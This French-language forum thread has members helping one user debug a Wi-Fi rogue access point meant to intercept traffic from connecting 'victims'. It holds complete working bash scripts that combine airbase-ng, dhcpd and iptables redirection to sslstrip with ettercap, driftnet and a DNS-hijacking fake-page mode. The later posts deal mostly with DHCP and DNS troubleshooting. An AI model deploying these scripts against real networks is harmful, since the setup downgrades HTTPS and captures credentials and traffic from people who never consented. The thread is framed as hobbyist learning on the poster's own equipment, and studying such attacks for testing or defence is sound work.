Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 24-06-2010 10:32:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Victory.jpg

Victory !!

Wouhou ! Bien joué, t'y es finalement arrivé big_smile C'était sans doute l'[c]ip_forward[/c] qui déconnait... Enfin, je reconnaîtrai cette victoire complète et sans discussion une fois que tu auras reproduit l'exploit sur ta freebox tongue

Sinon, pour le problème de l'HTTP, je suis quasiment certain que c'est ta dernière ligne d'iptable qui est en cause. A mon avis tu as juste oublié de lancer SSLStrip en plus, ce qui fait que tout le trafic HTTP (sur le port 80, redirigé vers 10000 par iptable) est perdu, parce que rien n'est en écoute sur le port 10000. HTTPS n'a pas le problème parce que tu es directement sur le port 443, qui n'est pas concerné par la redirection. J'ai bon ? smile

"Les plaisirs de la vie sont faits d'obscures victoires  qui nous procurent  nos petites satisfactions." -- Billy Joel wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 24-06-2010 11:11:33

Floux
Membre Radioactif
Inscription : 23-04-2010
Messages : 92

Re : Rogue AP : OK sauf internet !

Good job smile ca fait plaisir.


Si ca peut t aider pour la suite... wink


echo -n "Démarrage ettercap" ;
xterm -hold -e ettercap -T -q -p -i at0 // // &> /dev/null & ettpid=$!
echo -e $ok
sleep 5
echo -n "Démarrage sslstrip" ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
xterm -hold -e sslstrip -a -k -f &> /dev/null & sslpid=$!
echo -e $ok
sleep 3
echo -n "Démarrage driftnet" ;
xterm -hold -e driftnet -v -i at0 &> /dev/null & driftpid=$!
echo -e $ok
sleep 4
;;

4)
clear
echo -e $intro
echo -e "\033[01;35m   --== RogueAP With Fake Page ==--\033[0m"
sleep 2
echo -n "Nettoyage des iptables..." ;
kill $ettpid ;
sleep 2
kill $sslpid ;
sleep 2
kill $driftpid ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
echo -e $ok
sleep 3
echo -n "Routage des adresses vers moi" ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.129 ;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j DNAT --to 192.168.1.129 ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
echo -e $ok

Dernière modification par Floux (24-06-2010 11:31:54)

Hors Ligne

#28 25-06-2010 00:22:09

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Bon, tout fonctionne ! Pour la livebox, j'avais un mauvais DNS, c'est ça je pense ! Je reviens chez moi demain donc de toutes façons je vous tiens au jus mais j'ai bien compris les commandes, le principe donc je saurais à l'avenir résoudre un problème seul, en tout cas avec cette histoire de Rogue AP.

Merci à vous tous, j'ai bien progressé donc je suis ravis ! J'ai cherché à automatiser tout seul ce que j'avais intégré dans ce petit script (stupide et inutile mais me fait théoriser ce que j'ai compris) :

#!/bin/bash

#############################
#  _______________________________________	#	
#  |           Ma Fake AP 	 	 |	        #
#  |   	     				 |	        #
#  |   	  Script Réalisé par Carto_	 |	#
#  |   					 |	        #
#  |             VERSION ONE	         |	        #
#  |_____________________________________|	#
#						#
#  			                        #
#  Carto_ []			        #
#  						#
#                                            	#
#						#
#################################################

# Colored dialogs
GREEN="\033[1;32m"
RED="\033[1;31m"
END="\033[1;37m"

killall -9 dhcpd tcpdump airbase-ng
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2


echo -e ""$RED"...***    Script Codé par Carto_, mise en place d'une ROGUE AP fonctionnelle   *** ..."$END"";
echo
echo
echo
echo "Activtation de l'IP Foward:";
echo 1 > /proc/sys/net/ipv4/ip_forward;
cat /proc/sys/net/ipv4/ip_forward;
echo -e "$GREEN""***[ Activation reussie ]***""$END" ;
echo
echo

echo "Interface connectée à internet (wlan0, eth0 ?)";
read IFACE;
echo

echo "Interface utilisée pour la construction de la Rogue AP (wlan0, wlan1, wlan2 ... ?)";
read WIFACE
echo



echo ""GREEN"Si j'ai bien compris, vous êtes connecté à internet via $IFACE et votre interface wifi $WIFACE sera utilisée pour créer la Rogue AP (carte supportant l'injection et le mode monitor) ?"END"";
echo "Tapez Y si la phrase précédente est correcte, F si elle est fausse";
read REPONSE

if [ $REPONSE = "Y" ];then 
echo ""GREEN"Le script continue ...."END"";


airmon-ng start $WIFACE
modprobe tun
echo
echo
echo "Quel nom souhaitez-vous donner à votre Rogue AP ?"
read NAME_AP

xterm -hold -e airbase-ng -P -C 30 -c 10 -e $NAME_AP -v mon0 &>/dev/null &
sleep 2

modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;


mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd/dhcpd_marine.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
sleep 2

echo
echo "Quel serveur DNS ? (80.10.246.2  pour la Livebox et 212.27.40.240 pour Free )";
read DNS


iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to $DNS ;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ;

xterm -hold -e sslstrip -a -k -f &> /dev/null &
sleep 2


echo
echo "Le SCRIPT est Running, attente d'une connection victime ..."

else
echo "Merci de relancer le SCRIPT et de ne pas te tromper cette fois-ci, looser !"
fi

--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#29 25-06-2010 00:23:35

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Vraiment merci à tous ceux qui m'auront dépanné en ces temps difficiles de crise économique ! Merci à Floux et antares145 de s'être fait braire jusqu'au bout, cet esprit de partage m'impressionnera toujours !

smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#30 25-06-2010 18:39:00

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

C'est décidé, je vais chercher la corde pour me pendre !

Fonctionne à l'aise (le script) sur la Livebox mais pas sur la Freebox  (pourtant je l'ai mise en 192.168.1.1)

... Le DNS 212.27.40.240 (ou 212.27.40.241) rien n'y fait, impossible de ping 192.168.1.1 ................................


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#31 18-09-2010 00:13:39

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

RE-BONJOUR A TOURS !



Après des vacances bien méritées je reviens vers vous, avec toujours le même problème ! Et pourtant ça marchait sous Livebox mais pas sous Freebox, décidément, je n'y comprend plus rien !

- Un PC sous BT4 R1
- Un Macbook pro pour se connecter à la Rogue
- Une Freebox en 192.168.1.1

- Internet sur wlan1
- Alpha 36H sur mon0 (wlan0)




/root/dhcpd.conf


Code:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 192.168.1.1;
range 192.168.1.130 192.168.1.140;
}

Airbase

Code:

airbase-ng -P -C 30 -c 6 -e "test" -v mon0

Code:

modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

serveur dhcpd

Code:

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &

iptables


Code:

iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
iptables -t nat -A PREROUTING -p udp -j DNAT --to 212.27.40.240 ;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ;

La Rogue apparait donc dans mes réseaux wifi. J'y connecte mon Mac et mon iPhone. Impossible de ping 192.168.1.1 (Freebox) depuis le mac mais possible, du Macbook, d'effectuer un ping du mac vers l'iPhone () connecté lui aussi à la rogue.

J'ai donc des ip mais pas internet.


Oui, l'ip_forward est bien activé ... Oui mon PC a bien une connexion internet effective via la Livebox...

[email protected]:~# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.128   192.168.1.129   255.255.255.128 UG    0      0        0 at0
192.168.1.128   *               255.255.255.128 U     0      0        0 at0
192.168.1.0     *               255.255.255.0   U     0      0        0 wlan1
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan1

Je ne m'en sort pas et j'en ai vraiment raz-le-bol, je VEUX y arriver ! Je ne saurais comment remercier mon sauveur éventuel, un infini merci à qui prendre le temps de me lire et de me répondre

Je vous aime ... par avance !


Carto_


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#32 18-09-2010 12:41:24

NoCrash
Membre d'honneur
Inscription : 09-04-2009
Messages : 148

Re : Rogue AP : OK sauf internet !

Ta freebox est elle bien configuré pour répondre aux messages ICMP ?

Hors Ligne

#33 18-09-2010 13:59:50

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Tu me pose une colle, je suis allé voir sur l'interface de gestion de la Freebox mais je n'y trouve rien concernant l'ICMP.
Je pense pas que ça vienne de la Freebox mais plutôt de la façon dont j'organise le tout, je dois faire une erreur quelque part mais je ne vois vraiment pas !


Merci d'avances pour vos lumières, je patauge vraiment dans la semoule !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#34 18-09-2010 14:09:10

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Il s'accroche dur, le Carto_ big_smile

La suggestion de NoCrash n'est pas mauvaise, c'est peut-être simplement ta Freebox qui est configurée pour ne pas répondre aux pings (ICMP echo request) wink
Par contre, comment l'activer je n'en sais rien, j'ai pas de freebox sous la main hmm Google doit sûrement le savoir wink

Ca donne quoi si tu essaies de ping'er une IP externe, genre 8.8.8.8 (facile à retenir) ? Et si ca ne passe pas, quelle est l'erreur (no route to host, host unreachable, network is down, time to have a nap big_smile) ? Et si t'essaies de ping'er ta machine attaquante (même question) ?

Tes machines victimes ont quoi comme IP ? Si tu sais, donne-nous également le résultat d'un [c]ifconfig[/c] de ton macbook (c'est Unix based, faut juste que tu trouves le terminal tongue), en filtrant juste l'interface concernée smile

Là, comme ca je vois pas de grosse erreur, mais j'ai pas le temps de me plonger à fond dans les détails pour l'instant wink

Hors Ligne

#35 18-09-2010 14:43:43

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Ehhh oui je m'accroche dur comme fer, j'en dors plus la nuit et toute cette histoire commence à me donner des sueurs froides !


Pour résumer donc :

J'effectue les commandes indiquées au post #31, tout fonctionne et la Rogue AP est bien accessible du Macbook et de l'iPhone. J'y connecte donc mon iPhone et mon Macbook.

Là, évidemment, je ne peux pas surfer comme je l'entends, pourtant j'ai bien des adresses ip assignées.


De mon Macbook :

- Ping 8.8.8.8 : impossible
- Ping 192.168.1.1 (Freebox) : impossible
- Ping 192.168.1.13 (PC attaquant) : impossible

MAIS, étrangement, je peux ping mon iPhone (connecté à la Rogu) avec mon Macbook.


Mon iPhone :

- IP : 169.254.158.187
- Masque de sous réseau : 255.255.0.0
- Routeur : rien
- DNS : rien


Dans le terminal de mon mac  : PING 169.254.158.187 FONCTIONNE !



Bref, je n'y comprend plus rien alors si vous avez des idées, pour m'aider, une marche à suivre ... Je vous invite tous à la taverne pour une tournée de chopines si jamais j'arrive à résoudre mon problème, ce dont je commence à douter (pas faute d'essayer croyez-moi !).


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#36 18-09-2010 14:56:05

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Y a une coui**e avec le DHCP... Comme quoi j'ai bien fait de te demander les adresses de tes machines-victimes (tu ne réponds pas pour le macbook, accessoirement, mais j'ai peur de connaître la réponse).

Les adresses de la plage 169.254.0.0/16 est réservée par le mécanisme APIPA/IPv4LL/Zeroconf/Avahi (4 noms pour la même chose --> Automatic Private Internet Protocol Addressing [Wikipedia]). En gros, si aucun serveur DHCP ne répond aux demandes des stations, l'OS peut attribuer lui-même une adresse IP dans une classe "spéciale" pour permettre de communiquer avec la machine. C'est le cas ici : ton iPhone reçoit une adresse du type 169.254.*.* (qui est la plage spéciale en question) au lieu d'une adresse dans 192.168.1.130-140 hmm

C'est donc au niveau du processus dhcp (ou de sa configuration) qu'il y a un problème (ou un manquement) ; le truc c'est que je suis loin d'être un spécialiste là-dedans : la seule fois où j'me suis intéressé à la question ca n'a jamais voulu marcher. Je suppose qu'il est temps de prendre ma revanche big_smile

Je vais regarder ça d'un peu plus près ce soir, mais ton choix d'un sous-réseau /17 (le 255.255.255.128) complique un peu la compréhension des IP en jeu hmm

Par ailleurs je me répète : quand un ping est "impossible", ça serait bien que tu nous donnes le message d'erreur exact (je t'ai donné quelques exemples dans le post précédent). Parce que entre "no route to host" et "host is unreachable", la source du problème n'est pas comparable wink

Hors Ligne

#37 18-09-2010 15:04:34

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

No route to host pour les pings ... Je me renseigne aussi quant aux DHCP, tu m'éclaires beaucoup en m'expliquant qu'en fait ma Rogue n'attribue aucune adresse !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#38 18-09-2010 17:56:11

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Décidément, il y a un truc qui doit réellement planter puisque :

= Avec mon script toujours ce problème
= Avec d'autres scripts (genre AIRSSL.sh, même problème).

PAR PITIÉ que quelqu'un trouve !!!


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#39 19-09-2010 16:55:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Bon, on va pas s'emballer, s'il y a bien une chose que je ne supporte pas c'est qu'on implore la pitié pour un problème informatique à 2 balles roll

Ceci étant dit, je n'ai pas encore eu le temps de tester étape par étape chez moi (p-ê ce soir, mais j'y crois peu). Tu peux essayer avec cet autre script, pour voir si ca marche --> Airbase Ap Tutorial
Si jamais ca marche avec celui-là, il faudra vérifier toutes les différences qu'il y a entre tes commandes et les siennes, pour voir où est le problème. Mais en parcourant les 2 scripts en diagonale vous avez l'air de faire sensiblement la même chose (sauf au niveau du subnet...)

Comme on sait que le problème est le DHCP, ca peut servir de jeter un œil aux différents fichiers de log :

cat /var/lib/dhcp3/dhcpd.leases
cat /var/lib/dhcp3/clients.leases     //S'il existe...
cat /var/log/messages       //J'y crois moins...

Faudrait aussi que tu modifies cette ligne de ton script :

xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &

devient -->

xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &

En ne redirigant pas la sortie vers [c]/dev/null[/c], on permet l'affichage de messages de [c]dhcpd3[/c] sur la console, ce qui peut s'avérer utile...

Je vais essayer de faire tourner ton script chez moi, mais comme je n'ai pas de Freebox, je ne sais pas si ça sera pertinent hmm Je crois qu'il va vmt falloir se plonger dans les détails de configuration du DHCP (joie !)... Une première piste, peut-être ?

Hors Ligne

#40 21-09-2010 00:24:48

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

cat /var/lib/dhcp3/dhcpd.leases

# The format of this file is documented in the dhcpd.leases(5) manual page.
# This lease file was written by isc-dhcp-V3.1.1

Les autres n'existent pas...

J'ai aussi suivi ce tuto : http://www.backtrack-linux.org/forums/b … sl-sh.html

Qui a le mérite d'être intéressant et surtout assez long, pas mal de questions d'users un peu perdu.

Mais j'ai toujours le même problème : Rogue AP détectée, connexion possible mais problème de DHCP, IP auto-assignée et donc pas de connexion possible.

Je cherche, je cherche desespérément ... Tu n'imagines pas combien de fois j'ai relancé les scripts dans tous les sens et essayé 20 000 méthodes différentes ...


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#41 21-09-2010 01:03:10

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Et puis je réfléchissais à un truc, il y a nécessairement un truc qui vient du réseau en soit ...

Je viens de formater un vieux PC pour le mettre sous BT4 R1, tout neuf.
Je lance la Rogue AP avec ma 36H et là même problème ... Je commence à me dire que le problème vient certes du DHCP mais je comprends pas pourquoi ça plante comme ça avec un script qui marche pour tous !

Je commence à me poser des questions, si à la fin de semaine le problème n'est pas résolu je me fais interner ! Vite vite, je vais continuer mes tests smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#42 21-09-2010 01:26:19

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 192.168.1.1;
range 192.168.1.130 192.168.1.140;
}

Mon dhcpd.conf, au cas ou mais pourtant il est fonctionnel !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#43 21-09-2010 10:00:17

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Le truc qui me paraît bizarre, c'est que ton script a l'air de marcher sur un réseau Livebox, mais pas sur ta freebox... Or, la partie DHCP-attribution d'IP travaille juste entre ta victime et ton attaquant, aucune intervention de la box. Il n'y a donc aucune raison que ca foire en changeant d'opérateur, donc question : qu'est-ce que tu as changé depuis ton essai fructueux ? smile

Et là je réponds : pourquoi es-tu passé d'un sous-réseau 192.168.2.255 (premier post du topic) à 192.168.1.255 (ton dernier post) ? Il faut que tu isoles le sous-réseau de tes victimes du LAN principal (attaqué), sinon ca va déconner. Et même si tu as des réglages de netmask qui devraient empêcher le problème, à ta place je n'irais pas jouer en 192.168.1.* pour tes victimes smile

Hors Ligne

#44 21-09-2010 10:11:41

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Parce que la livebox était en 192.168.2.1 et que je l'ai repassée, avec la Freebox, en 192.168.1.1 pour éviter d'avoir à éditer mes scripts ... Tu penses qu'il faut que je laisse en 2.x quand même ? Quand bien même la box serait sur 192.168.1.1 ?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#45 21-09-2010 13:36:35

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Je suis entrain de me demander si c'est pas tout simplement ma Carte, l'Alpha 36H qui ne serais pas en galère ! Sur pas mal de forums je trouve des gens qui ont aussi des soucis avec l'Alpha pour Rogue AP ! (Notamment dans le post de Nick_the_Greek sur remote.exploit (wlan_nick script).

Donc je pense à commander une autre carte pour effectuer la comparaison, de toutes façons je comptais en acheter une. Vous me conseillez quoi pour BT4 R1 ? Une Atheros me parait tout indiquée pour monter une Rogue AP non ?

Sinon j'ai toujours mon vieux WRT54GL mais pour monter une Rogue AP ça va être on ne peut plus compliqué !

Bref, qu'en pensez-vous ?!


EDIT : http://forums.remote-exploit.org/wirele … 187-a.html

Apparemment donc l'Alpha serait responsable de mon problème, enfin il y a des chances ! En attendant que vous m'indiquez la meilleure carte à acheter pour ce travail, je suis sur un Macbook et donc je pensais faire comme il l'indique dans le script :

- Je connecte l'Alpha sur le Mac, je crée une AP (SOFT AP) avec cette dernière
- Je lance mon BT4 R1 dans mon Mac (wmware) et je chope ce qui transite ?

? ça vous parait faisable ?
(sahcant qu'internet est délivré via la Carte intégrée de mon mac)

Dernière modification par Carto_ (21-09-2010 16:28:28)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#46 22-09-2010 19:19:27

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Chers amis, aujourd'hui est un GRAND jour !!

Après un acharnement quasi-psychopathique sur mon problème de Rogue AP, j'ai enfin réussi à mettre le nez dans ce qui clochait ! Deux choses :

- Lorsqu'un client vient se connecter sur la Rogue AP, qu'il soit sous Linux ou Windows : ça fonctionne !
- Lorsqu'un client sous MAC OSX VIENT s'y connecter, il ne dialogue pas avec le serveur DHCP de la Rogue et s'auto-assigne une IP, ce qui a pour conséquence d'empêcher le surf. Je n'ai toujours pas résolu ce problème mais j'y travaille et je viendrais vous donner les fruits de mes recherches sous peu. iPhone ou Macbook, même duel, ça ne fonctionne pas !

- Le dernier problème venait de ma configuration du DNS ! En fouillant dans les logs j'ai finalement compris ça et du coup j'ai remplacé le DNS que j'utilisais (celui de FREE ou encore aucun) pour le remplacer par un OpenDNS : 208.67.222.222 et tout fonctionne à merveille !


Je voudrais tous vous remercier pour votre aide, Floux, mais surtout Antares, qui m'a bien guidé et donné de son temps ! Bref, je résous vite ce problème lié au Mac et tout sera fonctionnel !

Je vous poste un petit script lorsque j'ai clôturé le tout !


smile

SUCCESS !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#47 23-09-2010 12:37:51

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP : OK sauf internet !

Alleluia mes amis, le Seigneur est grand !! big_smile

Carto_ a écrit :

Après un acharnement quasi-psychopathique sur mon problème de Rogue AP, j'ai enfin réussi à mettre le nez dans ce qui clochait !

C'est rien de l'dire roll

Carto_ a écrit :

Lorsqu'un client sous MAC OSX VIENT s'y connecter, il ne dialogue pas avec le serveur DHCP de la Rogue et s'auto-assigne une IP, ce qui a pour conséquence d'empêcher le surf. Je n'ai toujours pas résolu ce problème mais j'y travaille et je viendrais vous donner les fruits de mes recherches sous peu. iPhone ou Macbook, même duel, ça ne fonctionne pas !

Bord*l, et après ca on me demande encore ce que j'ai contre les machines Apple mad Tout ça pour ça...

Bon ca veut dire qu'il va falloir trouver les options kivonbien pour faire plaisir à Steve Jobs... Dans la page de man de dhcpd, il y a 2-3 options qui semblent n'être utilisées que par les machines Apple, mais je ne sais pas ce qu'il faut y mettre comme paramètres. Idéalement, il faudrait vérifier aussi si le serveur DHCP répond (et que les machines ignorent la réponse) ou si c'est vraiment le DHCP qui est muet face aux-dites machines. Pour ca, lance Wireshark en écoute sur ton interface at0, et regarde ce qui se passe pendant la (tentative de) connexion wink

Mais commence par aller faire une bonne sieste reposante, t'as des heures de sommeil à récupérer tongue

Hors Ligne

#48 23-09-2010 13:29:32

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Rogue AP : OK sauf internet !

Apparemment c'est plutôt le client Mac qui ne dialogue pas avec le DHCP, donc pour le DHCP personne n'essaye de se connecté. Le client mac est donc connecté à l'AP mais ne demande rien au DHCP et apparemment ils semblent s'ignorer cordialement.

Bref, je fais mes recherches de ce coté et je vais en effet commencer par effectuer quelques tests avec Wireshark, mais avant tout, tu as raison, une bonne sieste s'impose !!


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#49 23-12-2014 16:41:58

zerocool
Nouveau membre
Inscription : 24-01-2013
Messages : 7

Re : Rogue AP : OK sauf internet !

Hello !

Je voulais savoir, ayant une install kali x64 propre, si les commandes :

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

servent bien à remettre tout en ordre au niveau du pare-feu, et éliminer toutes les règles de routage testées... ?
ce qui permets de reprendre les choses à zero si on se plante^^

Merci.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2129 28-11-2016 19:42:10 par koala
35 1750 23-11-2016 16:31:33 par roofnat
16 1037 17-11-2016 12:22:00 par disquette
10 422 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 446 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.042 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]